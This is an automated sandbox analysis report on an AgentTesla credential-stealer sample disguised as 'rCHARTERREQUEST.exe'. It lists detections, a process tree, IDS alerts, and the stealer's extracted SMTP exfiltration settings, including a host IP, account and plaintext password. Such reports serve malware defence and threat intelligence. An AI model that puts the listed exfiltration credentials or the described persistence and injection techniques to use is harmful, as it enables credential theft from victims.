Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rCHARTERREQUEST.exe

Overview

General Information

Sample name:rCHARTERREQUEST.exe
Analysis ID:1589737
MD5:9773f17f57d5a69d3a69eec6def1a8a3
SHA1:86e0269b21c64ffdc344ef0792fbaaaeb058d416
SHA256:37fbb8aab11fee86746dca42f37cc3e1f8af646d595cd292dc04963d9c82b89a
Tags:exeuser-Porcupine
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
AI detected suspicious sample
Drops VBS files to the startup folder
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • rCHARTERREQUEST.exe (PID: 7388 cmdline: "C:\Users\user\Desktop\rCHARTERREQUEST.exe" MD5: 9773F17F57D5A69D3A69EEC6DEF1A8A3)
    • ckuv.exe (PID: 7816 cmdline: "C:\Users\user\AppData\Local\Temp\ckuv.exe" MD5: CDD3D1BB178C391A905C40D2B292F4D6)
    • InstallUtil.exe (PID: 7904 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 8076 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ilsucsfth.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • ilsucsfth.exe (PID: 8128 cmdline: "C:\Users\user\AppData\Roaming\ilsucsfth.exe" MD5: 9773F17F57D5A69D3A69EEC6DEF1A8A3)
      • InstallUtil.exe (PID: 6756 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxambro@educt.shop", "Password": "ABwuRZS5Mjh5"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1927556031.00000000043E6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000002.1927556031.00000000043E6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000005.00000002.2386337733.0000000000542000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000005.00000002.2386337733.0000000000542000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000007.00000002.2409994915.000000000419E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 30 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              7.2.ilsucsfth.exe.432fabe.4.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                0.2.rCHARTERREQUEST.exe.6c70000.8.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  7.2.ilsucsfth.exe.432fabe.4.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    0.2.rCHARTERREQUEST.exe.6c70000.8.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                      7.2.ilsucsfth.exe.43af2b0.9.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                        Click to see the 18 entries

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: WScript or CScript Dropper
                        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ilsucsfth.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ilsucsfth.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ilsucsfth.vbs" , ProcessId: 8076, ProcessName: wscript.exe
                        Sigma detected: Suspicious Outbound SMTP Connections
                        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 162.254.34.31, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Initiated: true, ProcessId: 7904, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49741
                        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ilsucsfth.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ilsucsfth.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ilsucsfth.vbs" , ProcessId: 8076, ProcessName: wscript.exe

                        Data Obfuscation

                        barindex
                        Sigma detected: Drops script at startup location
                        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\rCHARTERREQUEST.exe, ProcessId: 7388, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ilsucsfth.vbs

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-01-13T03:00:53.548304+010020301711A Network Trojan was detected192.168.2.449846162.254.34.31587TCP
                        2025-01-13T03:02:13.682447+010020301711A Network Trojan was detected192.168.2.449741162.254.34.31587TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-01-13T03:01:28.202237+010028555421A Network Trojan was detected192.168.2.449741162.254.34.31587TCP
                        2025-01-13T03:02:15.237440+010028555421A Network Trojan was detected192.168.2.449846162.254.34.31587TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-01-13T03:01:28.202237+010028552451A Network Trojan was detected192.168.2.449741162.254.34.31587TCP
                        2025-01-13T03:02:15.237440+010028552451A Network Trojan was detected192.168.2.449846162.254.34.31587TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-01-13T03:01:30.505027+010028032742Potentially Bad Traffic192.168.2.449742194.15.112.248443TCP
                        2025-01-13T03:01:32.630461+010028032742Potentially Bad Traffic192.168.2.449743194.15.112.248443TCP
                        2025-01-13T03:01:34.306463+010028032742Potentially Bad Traffic192.168.2.449744194.15.112.248443TCP
                        2025-01-13T03:01:35.988758+010028032742Potentially Bad Traffic192.168.2.449745194.15.112.248443TCP
                        2025-01-13T03:01:37.695396+010028032742Potentially Bad Traffic192.168.2.449746194.15.112.248443TCP
                        2025-01-13T03:01:40.071454+010028032742Potentially Bad Traffic192.168.2.449748194.15.112.248443TCP
                        2025-01-13T03:01:41.764995+010028032742Potentially Bad Traffic192.168.2.449749194.15.112.248443TCP
                        2025-01-13T03:01:43.542118+010028032742Potentially Bad Traffic192.168.2.449750194.15.112.248443TCP
                        2025-01-13T03:01:45.247307+010028032742Potentially Bad Traffic192.168.2.449751194.15.112.248443TCP
                        2025-01-13T03:01:46.927249+010028032742Potentially Bad Traffic192.168.2.449752194.15.112.248443TCP
                        2025-01-13T03:01:49.213818+010028032742Potentially Bad Traffic192.168.2.449753194.15.112.248443TCP
                        2025-01-13T03:01:50.894839+010028032742Potentially Bad Traffic192.168.2.449754194.15.112.248443TCP
                        2025-01-13T03:01:53.708411+010028032742Potentially Bad Traffic192.168.2.449755194.15.112.248443TCP
                        2025-01-13T03:01:55.397476+010028032742Potentially Bad Traffic192.168.2.449756194.15.112.248443TCP
                        2025-01-13T03:01:58.141399+010028032742Potentially Bad Traffic192.168.2.449758194.15.112.248443TCP
                        2025-01-13T03:02:00.202382+010028032742Potentially Bad Traffic192.168.2.449760194.15.112.248443TCP
                        2025-01-13T03:02:02.125316+010028032742Potentially Bad Traffic192.168.2.449766194.15.112.248443TCP
                        2025-01-13T03:02:04.913280+010028032742Potentially Bad Traffic192.168.2.449777194.15.112.248443TCP
                        2025-01-13T03:02:06.611159+010028032742Potentially Bad Traffic192.168.2.449795194.15.112.248443TCP
                        2025-01-13T03:02:09.179030+010028032742Potentially Bad Traffic192.168.2.449809194.15.112.248443TCP
                        2025-01-13T03:02:10.913892+010028032742Potentially Bad Traffic192.168.2.449820194.15.112.248443TCP
                        2025-01-13T03:02:13.499305+010028032742Potentially Bad Traffic192.168.2.449829194.15.112.248443TCP
                        2025-01-13T03:02:15.180541+010028032742Potentially Bad Traffic192.168.2.449845194.15.112.248443TCP
                        2025-01-13T03:02:17.497559+010028032742Potentially Bad Traffic192.168.2.449857194.15.112.248443TCP
                        2025-01-13T03:02:19.212591+010028032742Potentially Bad Traffic192.168.2.449870194.15.112.248443TCP
                        2025-01-13T03:02:21.382837+010028032742Potentially Bad Traffic192.168.2.449884194.15.112.248443TCP
                        2025-01-13T03:02:23.257446+010028032742Potentially Bad Traffic192.168.2.449897194.15.112.248443TCP
                        2025-01-13T03:02:25.202950+010028032742Potentially Bad Traffic192.168.2.449913194.15.112.248443TCP
                        2025-01-13T03:02:27.125801+010028032742Potentially Bad Traffic192.168.2.449924194.15.112.248443TCP
                        2025-01-13T03:02:28.818368+010028032742Potentially Bad Traffic192.168.2.449935194.15.112.248443TCP
                        2025-01-13T03:02:30.513666+010028032742Potentially Bad Traffic192.168.2.449945194.15.112.248443TCP
                        2025-01-13T03:02:33.450332+010028032742Potentially Bad Traffic192.168.2.449961194.15.112.248443TCP
                        2025-01-13T03:02:36.205624+010028032742Potentially Bad Traffic192.168.2.449977194.15.112.248443TCP
                        2025-01-13T03:02:37.912629+010028032742Potentially Bad Traffic192.168.2.449990194.15.112.248443TCP
                        2025-01-13T03:02:39.620276+010028032742Potentially Bad Traffic192.168.2.450004194.15.112.248443TCP
                        2025-01-13T03:02:41.812060+010028032742Potentially Bad Traffic192.168.2.450013194.15.112.248443TCP
                        2025-01-13T03:02:43.511777+010028032742Potentially Bad Traffic192.168.2.450029194.15.112.248443TCP
                        2025-01-13T03:02:45.191406+010028032742Potentially Bad Traffic192.168.2.450040194.15.112.248443TCP
                        2025-01-13T03:02:46.908277+010028032742Potentially Bad Traffic192.168.2.450049194.15.112.248443TCP
                        2025-01-13T03:02:48.611890+010028032742Potentially Bad Traffic192.168.2.450050194.15.112.248443TCP
                        2025-01-13T03:02:50.887918+010028032742Potentially Bad Traffic192.168.2.450051194.15.112.248443TCP
                        2025-01-13T03:02:52.584909+010028032742Potentially Bad Traffic192.168.2.450052194.15.112.248443TCP
                        2025-01-13T03:02:55.276819+010028032742Potentially Bad Traffic192.168.2.450053194.15.112.248443TCP
                        2025-01-13T03:02:56.961335+010028032742Potentially Bad Traffic192.168.2.450054194.15.112.248443TCP
                        2025-01-13T03:02:58.879052+010028032742Potentially Bad Traffic192.168.2.450055194.15.112.248443TCP
                        2025-01-13T03:03:00.583154+010028032742Potentially Bad Traffic192.168.2.450056194.15.112.248443TCP
                        2025-01-13T03:03:05.291640+010028032742Potentially Bad Traffic192.168.2.450057194.15.112.248443TCP
                        2025-01-13T03:03:07.308516+010028032742Potentially Bad Traffic192.168.2.450058194.15.112.248443TCP
                        2025-01-13T03:03:09.027470+010028032742Potentially Bad Traffic192.168.2.450059194.15.112.248443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-01-13T03:00:53.548304+010028400321A Network Trojan was detected192.168.2.449846162.254.34.31587TCP
                        2025-01-13T03:02:13.682447+010028400321A Network Trojan was detected192.168.2.449741162.254.34.31587TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Found malware configuration
                        Source: 0.2.rCHARTERREQUEST.exe.43fbca8.0.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxambro@educt.shop", "Password": "ABwuRZS5Mjh5"}
                        Multi AV Scanner detection for dropped file
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeReversingLabs: Detection: 70%
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeReversingLabs: Detection: 21%
                        Multi AV Scanner detection for submitted file
                        Source: rCHARTERREQUEST.exeReversingLabs: Detection: 21%
                        Source: rCHARTERREQUEST.exeVirustotal: Detection: 35%Perma Link
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Machine Learning detection for dropped file
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeJoe Sandbox ML: detected
                        Machine Learning detection for sample
                        Source: rCHARTERREQUEST.exeJoe Sandbox ML: detected
                        Source: rCHARTERREQUEST.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.4:49732 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49740 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.4:49739 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.4:49747 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.4:49752 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49836 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.4:50059 version: TLS 1.2
                        Source: rCHARTERREQUEST.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: rCHARTERREQUEST.exe, 00000000.00000002.1930403057.00000000063D0000.00000004.08000000.00040000.00000000.sdmp, rCHARTERREQUEST.exe, 00000000.00000002.1927556031.0000000004149000.00000004.00000800.00020000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.0000000003F29000.00000004.00000800.00020000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.000000000419E000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: rCHARTERREQUEST.exe, 00000000.00000002.1930403057.00000000063D0000.00000004.08000000.00040000.00000000.sdmp, rCHARTERREQUEST.exe, 00000000.00000002.1927556031.0000000004149000.00000004.00000800.00020000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.0000000003F29000.00000004.00000800.00020000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.000000000419E000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: protobuf-net.pdbSHA256}Lq source: rCHARTERREQUEST.exe, 00000000.00000002.1933402312.0000000006C10000.00000004.08000000.00040000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.0000000004493000.00000004.00000800.00020000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.00000000043AF000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: protobuf-net.pdb source: rCHARTERREQUEST.exe, 00000000.00000002.1933402312.0000000006C10000.00000004.08000000.00040000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.0000000004493000.00000004.00000800.00020000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.00000000043AF000.00000004.00000800.00020000.00000000.sdmp
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 4x nop then jmp 06D4E743h0_2_06D4E6C0
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 4x nop then jmp 06D4E743h0_2_06D4E6B0
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 4x nop then jmp 06D4E743h0_2_06D4E671
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 4x nop then jmp 06D4E31Bh0_2_06D4DF68
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 4x nop then jmp 06D4E31Bh0_2_06D4DF37
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 4x nop then jmp 06D84AD4h0_2_06D84C79
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 4x nop then jmp 06D84AD4h0_2_06D84B45
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 4x nop then jmp 06D84AD4h0_2_06D848C8
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 4x nop then jmp 06D84AD4h0_2_06D848B8
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 4x nop then jmp 06C1E743h7_2_06C1E6C0
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 4x nop then jmp 06C1E743h7_2_06C1E6BB
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 4x nop then jmp 06C1E743h7_2_06C1E673
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 4x nop then jmp 06C1E31Bh7_2_06C1DF5F
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 4x nop then jmp 06C1E31Bh7_2_06C1DF63
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 4x nop then jmp 06C1E31Bh7_2_06C1DF68
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 4x nop then jmp 06C54AD4h7_2_06C54C7B
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 4x nop then jmp 06C54AD4h7_2_06C548C3
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 4x nop then jmp 06C54AD4h7_2_06C548C8

                        Networking

                        barindex
                        Suricata IDS alerts for network traffic
                        Source: Network trafficSuricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.4:49741 -> 162.254.34.31:587
                        Source: Network trafficSuricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.4:49846 -> 162.254.34.31:587
                        Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49846 -> 162.254.34.31:587
                        Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49741 -> 162.254.34.31:587
                        Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.4:49741 -> 162.254.34.31:587
                        Source: Network trafficSuricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.4:49741 -> 162.254.34.31:587
                        Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.4:49846 -> 162.254.34.31:587
                        Source: Network trafficSuricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.4:49846 -> 162.254.34.31:587
                        Source: global trafficTCP traffic: 192.168.2.4:49741 -> 162.254.34.31:587
                        Source: Joe Sandbox ViewIP Address: 194.15.112.248 194.15.112.248
                        Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                        Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                        Source: Joe Sandbox ViewIP Address: 162.254.34.31 162.254.34.31
                        Source: Joe Sandbox ViewASN Name: VIVIDHOSTINGUS VIVIDHOSTINGUS
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: unknownDNS query: name: api.ipify.org
                        Source: unknownDNS query: name: api.ipify.org
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49746 -> 194.15.112.248:443
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49742 -> 194.15.112.248:443
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49748 -> 194.15.112.248:443
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49745 -> 194.15.112.248:443
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49743 -> 194.15.112.248:443
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49744 -> 194.15.112.248:443
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49751 -> 194.15.112.248:443
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49749 -> 194.15.112.248:443
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49750 -> 194.15.112.248:443
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49752 -> 194.15.112.248:443
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49753 -> 194.15.112.248:443
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49777 -> 194.15.112.248:443
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49755 -> 194.15.112.248:443
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49760 -> 194.15.112.248:443
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49754 -> 194.15.112.248:443
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49829 -> 194.15.112.248:443
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49758 -> 194.15.112.248:443
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49809 -> 194.15.112.248:443
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49820 -> 194.15.112.248:443
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49945 -> 194.15.112.248:443
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49756 -> 194.15.112.248:443
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49961 -> 194.15.112.248:443
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49766 -> 194.15.112.248:443
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50055 -> 194.15.112.248:443
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50029 -> 194.15.112.248:443
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49913 -> 194.15.112.248:443
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50013 -> 194.15.112.248:443
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50004 -> 194.15.112.248:443
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49795 -> 194.15.112.248:443
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50058 -> 194.15.112.248:443
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50059 -> 194.15.112.248:443
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50056 -> 194.15.112.248:443
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49870 -> 194.15.112.248:443
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49924 -> 194.15.112.248:443
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49884 -> 194.15.112.248:443
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49845 -> 194.15.112.248:443
